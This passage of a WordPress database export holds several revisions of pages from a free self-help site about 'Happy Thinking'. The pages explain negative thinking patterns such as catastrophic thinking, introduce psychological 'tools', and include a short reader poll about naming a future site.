will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Negative thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-06-18 06:18:07', '2023-06-18 06:18:07', '', 1641, 'https://www.happythinking.com/?p=1890', 0, 'revision', '', 0),
(2032, 1, '2023-07-21 06:46:56', '2023-07-21 06:46:56', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2017,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking030723.jpg" alt="" class="wp-image-2017"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way your mind does its â€œthinkingâ€ plays a very important role in your happiness. Over time, your mind may have developed certain ways of thinking that can negatively affect your mental well-being. Such â€œnegative thinkingâ€ is very common and can happen to anyone. You may not even realise that you are thinking in such ways. If you are to achieve the best possible happiness in your life, it is important to recognise and change negative thinking when it happens to you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental techniques (â€œtoolsâ€) that you can use to deal with negative thinking. Such mental techniques will be very practical so that you will be able to use them in your daily life.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental techniques to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-21 06:46:56', '2023-07-21 06:46:56', '', 88, 'https://www.happythinking.com/?p=2032', 0, 'revision', '', 0),
(2026, 1, '2023-07-18 09:01:16', '2023-07-18 09:01:16', '<!-- wp:paragraph -->\n<p>In our day-to-day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to negative thinking patterns in them. I will now explain one such negative thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (For example, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.Â Â Â Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss negative thinking patterns is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became negative when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view. &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-07-18 09:01:16', '2023-07-18 09:01:16', '', 1620, 'https://www.happythinking.com/?p=2026', 0, 'revision', '', 0),
(2031, 1, '2023-07-21 06:44:10', '2023-07-21 06:44:10', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2017,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking030723.jpg" alt="" class="wp-image-2017"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way your mind does its â€œthinkingâ€ plays a very important role in your happiness. Over time, your mind may have developed certain ways of thinking that can negatively affect your mental well-being. Such â€œnegative thinkingâ€ is very common and can happen to anyone. You may not even realise that you are thinking in such ways. If you are to achieve the best possible happiness in your life, it is important to recognise and change negative thinking when it happens to you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental techniques (â€œtoolsâ€) that you can use to deal with negative thinking. Such mental techniques will be very practical so that you will be able to use them in your daily life.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental techniques to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-21 06:44:10', '2023-07-21 06:44:10', '', 88, 'https://www.happythinking.com/?p=2031', 0, 'revision', '', 0),
(2028, 1, '2023-07-19 19:59:28', '2023-07-19 19:59:28', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2017,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking030723.jpg" alt="" class="wp-image-2017"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way your mind does its â€œthinkingâ€ plays a very important role in your happiness. Over time, your mind may have developed certain ways of thinking that can negatively affect your mental well-being. Such â€œnegative thinkingâ€ is very common and can happen in anyone. You may not even realise that you are thinking in such ways. If you are to achieve the best possible happiness in your life, it is important to recognise and change negative thinking when it happens to you. On this free website, I will help you to achieve this by:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>Explaining to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Explaining to you various mental techniques (â€œtoolsâ€) that you can use to deal with negative thinking that happens to you. Such mental techniques will be very practical so that you will be able to use them in your day-to-day life.Â </li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental techniques to deal with it and using wisdom to see the world differently, together make what I call â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>I am confident that happy thinking will help you to find happiness in your life. This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-19 19:59:28', '2023-07-19 19:59:28', '', 88, 'https://www.happythinking.com/?p=2028', 0, 'revision', '', 0),
(2015, 1, '2023-07-03 10:11:45', '2023-07-03 10:11:45', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {"align":"left"} -->\n<p class="has-text-align-left">Hello! I am the author of this website. I will be grateful for a small favour (not money!) that will take you only a few seconds. Apart from this website, I also want to make a website which will have a story in which a wise monk advises a person on how to be happy. I need to choose a nice name for the website that will have this story. I have managed to purchase the website names shown below, but am not sure which one is best. I will be grateful if you will help me to decide which name to use by selecting the name below that you think is better and clicking the submit button. Your choice will be anonymously recorded and will really help me to decide. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-autosave-v1', '', '', '2023-07-03 10:11:45', '2023-07-03 10:11:45', '', 1910, 'https://www.happythinking.com/?p=2015', 0, 'revision', '', 0),
(2021, 1, '2023-07-04 14:39:07', '2023-07-04 14:39:07', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-07-04 14:39:07', '2023-07-04 14:39:07', '', 1034, 'https://www.happythinking.com/?p=2021', 0, 'revision', '', 0),
(2016, 1, '2023-07-03 10:18:33', '2023-07-03 10:18:33', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph 